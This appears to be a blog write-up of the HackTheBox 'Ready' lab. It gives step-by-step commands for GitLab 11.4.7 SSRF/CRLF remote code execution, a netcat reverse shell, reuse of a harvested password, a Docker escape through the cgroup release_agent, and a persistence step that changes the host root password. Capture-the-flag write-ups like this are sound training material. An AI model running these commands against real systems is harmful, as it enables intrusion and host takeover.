<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Ready - HackTheBox Writeup (10.10.10.220) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Ready - HackTheBox Writeup (10.10.10.220)">
<meta name="description" content="Medium-difficulty Linux box on exploiting CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 CE. Privilege escalation by abusing the notify_on_release feature in cgroups to escape the privileged Docker container.">
<meta property="og:description" content="Medium-difficulty Linux box on exploiting CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 CE. Privilege escalation by abusing the notify_on_release feature in cgroups to escape the privileged Docker container.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/d7a56d2476ef541853df356a46976f45.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/d7a56d2476ef541853df356a46976f45.png"></span>
</div>
<h1 class="Header__Title">Ready - HackTheBox Writeup (10.10.10.220)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Wed, May 19, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/GitLab">GitLab</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/Docker">Docker</a>
</span>
</div>
<div>
Medium-difficulty Linux box on exploiting CVE-2018-19571 (SSRF), CVE-2018-19585 (CRLF) vulnerabilities in GitLab 11.4.7 CE. Privilege escalation by abusing the notify_on_release feature in cgroups to escape the privileged Docker container.
</div>
</header>
<article id="https://www.notion.so/e73ae20743fa4c0cb7563459e4dc04c8" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/e8cc55bc17fe4b34b07790d2db093963" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/e8cc55bc17fe4b34b07790d2db093963"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/d38dad38d3df4d4fa7f9ca92a13498e5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Full TCP port scan:</span></span><div id="https://www.notion.so/a8bb0dd8242042148b54c29d4aaefa55" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.220 > ports.nmap</code></span></span></p></div><div id="https://www.notion.so/693e202275284f4096cff9acf669182a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Ports 22 and 5080 are open.</span></span></p></div></li><li id="https://www.notion.so/af5e9bb27b82472db7333716e58f9488" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan of the two open ports:</span></span><div id="https://www.notion.so/fb8cae07efbd4200858fb79660fb4cd8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,5080 10.10.10.220 > scan.nmap</code></span></span></p></div><div id="https://www.notion.so/78e9e4359e32457195892c85dd24e522" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">22 is SSH; 5080 is nginx serving HTTP.</span></span></p></div></li></ul><h2 id="https://www.notion.so/102e85b668e24417adee3ba8154b690d" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/102e85b668e24417adee3ba8154b690d"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/c3c9d659657f4eb4a01247c85e33e367" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port 5080 is running GitLab Community Edition 11.4.7, more than two years out of date at the time of writing.</span></span></li><li id="https://www.notion.so/7e0b6a0abeb141e19990aded767bf485" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Register and log in; any authenticated user can then import a repository from an arbitrary URL with an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://</code></span><span class="SemanticString"> or </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">git://</code></span><span class="SemanticString"> scheme, which is the request the server makes on our behalf</span><span 
class="SemanticString">.</span></span></li></ul><h2 id="https://www.notion.so/4278cd533650418b96a42dd039ae37e4" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/4278cd533650418b96a42dd039ae37e4"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/89accc5358fb41d8aded818571fe3f8f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">CVE-2018-19571 (SSRF) and CVE-2018-19585 (CRLF injection) in GitLab 11.4.7 chain into authenticated remote code execution (RCE): the SSRF reaches services that listen only on the GitLab host's loopback interface, and the CRLF injection (newlines smuggled in through the import URL) lets attacker-chosen lines be delivered to one of those internal services (Redis, in the public exploit), which is what turns a forged request into code execution.</span></span></li><li id="https://www.notion.so/781ad23c2f5246349b302aa5712d0bbb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The SSRF (server-side request forgery) sits in the repository import: GitLab rejects import URLs that point at localhost, but the check does not recognise the IPv4-mapped IPv6 spelling of the loopback address, which the network stack still connects to 127.0.0.1:</span></span><div id="https://www.notion.so/9d4387436d92484bb37f4c3a5559a4cf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">https://[0:0:0:0:0:ffff:127.0.0.1]</code></span></span></p></div></li><li id="https://www.notion.so/4d912757257446e897946d6d9c8b79f4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using the PoC written by Shad0wQu35t on </span><span class="SemanticString"><a class="SemanticString__Fragment 
SemanticString__Fragment--Link" href="https://github.com/mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution/blob/main/gitlab_rce.py">GitHub</a></span><span class="SemanticString">, we can get a shell as git:</span></span><div id="https://www.notion.so/8324790b62c9405d82a61bf6c68852df" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 ./gitlab_rce.py http://10.10.10.220:5080 10.10.14.53</code></span></span></p></div><div id="https://www.notion.so/94655d3c53ff4b1d84e77ed1f15b1863" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 42069</code></span></span></p></div></li><li id="https://www.notion.so/c7b731b0f0134847ba5a449fe943b189" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/b130bb8dbb984420bfb18c385e7e6bee" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/b130bb8dbb984420bfb18c385e7e6bee"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/7558a69989074da6888288faad7952ec" class="BulletedList"><span 
class="SemanticStringArray"><span class="SemanticString">Nothing useful in LinPEAS, moving on.</span></span></li><li id="https://www.notion.so/8bb1739253744e87ba4f8e13c8c8b59b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root_pass</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/3c4ca57f05114823a73d4613a4f4dd49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /root_pass</code></span></span></p></div><pre id="https://www.notion.so/6d50598dc1e44f17836f5544c7d247a5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>YG65407Bjqvv9A0a8Tm_7w</span></span></span></code></pre></li><li id="https://www.notion.so/04f9af98f3264141a4c3f48a899a2518" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found SMTP password in GitLab backup:</span></span><div id="https://www.notion.so/a6fae0ead7ca40b880f034459156cb76" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /opt/backup/gitlab.rb | grep pass</code></span></span></p></div><pre id="https://www.notion.so/601133eae3c346ffb3523880b759f851" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"</span></span></span></code></pre></li><li id="https://www.notion.so/abaa0e4f0b6047b0928bb6ebb764d8b1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Try to su into root:</span></span><div 
id="https://www.notion.so/03c523e018db4cf888e2ad02cefd8abc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su</code></span></span></p></div><pre id="https://www.notion.so/c8ea4bd110f7476f9dfccaa6773ab068" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>su: must be run from a terminal</span></span></span></code></pre></li><li id="https://www.notion.so/ca74d2b2525a4f148503b373a4bb5197" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The reverse shell has no controlling terminal, which is what </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">su</code></span><span class="SemanticString"> is complaining about (it is not a Docker restriction). Upgrade to a pty with Python:</span></span><div id="https://www.notion.so/d27f24c72de0438b8f836918911bb1b5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py</code></span></span></p></div><div id="https://www.notion.so/ef75bffc94764b70955737c8aadbb394" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 /tmp/shell.py</code></span></span></p></div></li><li id="https://www.notion.so/0d2fde6bdb3a42c191a1d578a10d9f62" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now in the pty, run </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">su</code></span><span class="SemanticString"> and try the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">smtp_password</code></span><span class="SemanticString"> from the backup (password reuse between the SMTP configuration and the root account):</span></span><div id="https://www.notion.so/7331bc14356b46589c0a5a1941c4edbf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su</code></span></span></p></div><div id="https://www.notion.so/115bcf18340b4000a97a4ca3c042e9ac" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wW59U!ZKMbG9+*#h</code></span></span></p></div></li><li id="https://www.notion.so/a55f030454754d19951119ca57f517a8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We are root, but only inside the Docker container. The container is privileged, so it is allowed to mount a cgroup v1 hierarchy, and that lets us escape by abusing the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">notify_on_release</code></span><span class="SemanticString"> feature of cgroups v1: when the last task in a cgroup exits, the kernel runs the program named in the hierarchy's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">release_agent</code></span><span class="SemanticString"> file. That program is started by the kernel on the host, as root and outside the container's namespaces, so it has to be addressed by a path that exists on the host. The kernel's cgroup v1 documentation describes the flag:</span></span><div id="https://www.notion.so/55237757126048ceaac6f5328c305b03" class="ColorfulBlock ColorfulBlock--BgGray Callout"><div class="Callout__Icon"><div class="Icon">◽</div></div><p class="Callout__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><em class="SemanticString__Fragment SemanticString__Fragment--Italic">1.4 What does notify_on_release do?</em></strong></span><span class="SemanticString"><em class="SemanticString__Fragment SemanticString__Fragment--Italic">
</em></span><span class="SemanticString">If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.</span></span></p></div></li><li id="https://www.notion.so/acc1dcc122b04fd1a8156761672493b8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Create cgroup directory, mount RDMA cgroup controller, and create child cgroup </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">x</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/d81c020cf1c84dabae771a4d798bb790" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mkdir ./cgrp && mount -t cgroup -o rdma cgroup ./cgrp && mkdir ./cgrp/x</code></span></span></p></div></li><li id="https://www.notion.so/98e2ac85543448319af96d660c86a0c6" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enable cgroup notifications on release of </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">x</code></span><span class="SemanticString"> cgroup by writing </span><span 
class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">1</code></span><span class="SemanticString"> to its </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">notify_on_release</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/4794bab8031041688f08c5c8c450f2b6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo 1 > ./cgrp/x/notify_on_release</code></span></span></p></div></li><li id="https://www.notion.so/7df261f49a954b39a4de3353d7419bbd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Grab the host-side path of the container's writable overlay layer (the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">upperdir=</code></span><span class="SemanticString"> option of the overlay mount listed in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/mtab</code></span><span class="SemanticString">) as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$host_path</code></span><span class="SemanticString">. Files the container creates in its root filesystem land under this directory on the host, which is how the host kernel will find our script:</span></span><div id="https://www.notion.so/e50ebdc919c74acd8e2d2c092a6199e7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ host_path=`sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab`</code></span></span></p></div></li><li id="https://www.notion.so/afe08df7057749cfb43260a0248013b2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Point the hierarchy's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">release_agent</code></span><span class="SemanticString"> file (it exists only at the root of the mounted hierarchy, not in child cgroups) at the host path of a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/cmd</code></span><span class="SemanticString"> script that we will create in the container:</span></span><div 
id="https://www.notion.so/b88b4458f87248e184957273dba4e105" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "$host_path/cmd" > ./cgrp/release_agent</code></span></span></p></div></li><li id="https://www.notion.so/10a6e338c32749d5b80dd1a1b4791cf0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Write the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/cmd</code></span><span class="SemanticString"> payload. It runs on the host, so </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root/root.txt</code></span><span class="SemanticString"> is the host's file, and its output has to go under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$host_path</code></span><span class="SemanticString"> so that it shows up as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/output</code></span><span class="SemanticString"> inside the container (the double quotes expand </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$host_path</code></span><span class="SemanticString"> now, so the script contains the literal host path):</span></span><div id="https://www.notion.so/8386025eb97b436391705666d9a45685" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo '#!/bin/sh' > /cmd</code></span></span></p></div><div id="https://www.notion.so/e6327789a76842c0817e4cf695768a85" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "cat /root/root.txt > $host_path/output" >> /cmd</code></span></span></p></div></li><li id="https://www.notion.so/91f057a7b4ef41dabdf75cd60bd35d17" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make the script executable, since the kernel will exec it directly:</span></span><div id="https://www.notion.so/417af2daf2b54df6889c03da222d9ee9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code 
class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod a+x /cmd</code></span></span></p></div></li><li id="https://www.notion.so/8a91b74ce80146f3aa0eeb845bb788f5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Trigger the release agent: start a throwaway shell, add its own PID to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">x</code></span><span class="SemanticString"> cgroup through </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">cgroup.procs</code></span><span class="SemanticString">, and let it exit. The cgroup is then empty, so the kernel runs </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">release_agent</code></span><span class="SemanticString"> on the host as root. </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">\$\$</code></span><span class="SemanticString"> is escaped so that the inner shell, not our interactive one, expands it to its PID:</span></span><div id="https://www.notion.so/064ff8b4205448ae86fea7365025dd49" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sh -c "echo \$\$ > ./cgrp/x/cgroup.procs"</code></span></span></p></div></li><li id="https://www.notion.so/b5fd5d9164f64a6d869dcfc8692209ea" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The host's root flag is now readable at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/output</code></span><span class="SemanticString"> inside the container. Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/e0b08b3ba48447248fb0f95470ace992" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/e0b08b3ba48447248fb0f95470ace992"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/39da063f4ad24868bc96fd8d424042c8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Write a second </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/cmd</code></span><span class="SemanticString"> 
payload that changes the root password. The script again runs as root on the host, so </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chpasswd</code></span><span class="SemanticString"> alters the host's root account, not the container's:</span></span><div id="https://www.notion.so/8d51316dc3654c3a94b5c1fad22a2625" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo '#!/bin/sh' > /cmd</code></span></span></p></div><div id="https://www.notion.so/9441164bd2d6403c9d2083994c4b38a9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "echo 'root:areyouready' | chpasswd" >> /cmd</code></span></span></p></div><div id="https://www.notion.so/618572652aea4f429c8783217640f5f7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ chmod a+x /cmd</code></span></span></p></div><div id="https://www.notion.so/9df3bd7163524b95982d281cc6816fa6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sh -c "echo \$\$ > ./cgrp/x/cgroup.procs"</code></span></span></p></div></li><li id="https://www.notion.so/1e3284d212b1476c8e03bd4a19682821" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">SSH into the host as root with the new password (port 22 from the initial scan is the host's sshd, and it accepts root password logins):</span></span><div id="https://www.notion.so/f120db29b99949b388210e61e15399ca" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh root@10.10.10.220</code></span></span></p></div></li></ul><h2 
id="https://www.notion.so/3d5f2297f43f43e58001ed165a1940ac" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/3d5f2297f43f43e58001ed165a1940ac"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/c5941f6001ce458ebc4a43227ba7b3d8" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/">https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/</a></span></span></li><li id="https://www.notion.so/1c05d359082d43628052eba5eb92b391" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" 